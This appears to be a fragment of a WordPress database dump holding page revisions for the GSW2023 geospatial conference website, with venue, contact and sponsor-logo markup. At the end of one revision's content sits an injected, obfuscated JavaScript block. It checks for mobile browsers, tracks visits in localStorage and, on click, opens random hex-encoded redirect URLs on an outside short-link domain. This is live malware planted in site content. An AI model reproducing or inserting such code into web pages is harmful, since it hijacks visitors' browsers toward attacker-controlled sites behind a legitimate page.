css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n&nbsp;\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-autosave-v1','','','2023-06-25 15:43:38','2023-06-25 15:43:38','',3066,'https://gsw2023.com/?p=4817',0,'revision','',0),
(4818,4,'2023-06-25 15:45:16','2023-06-25 15:45:16','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" />\r\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: 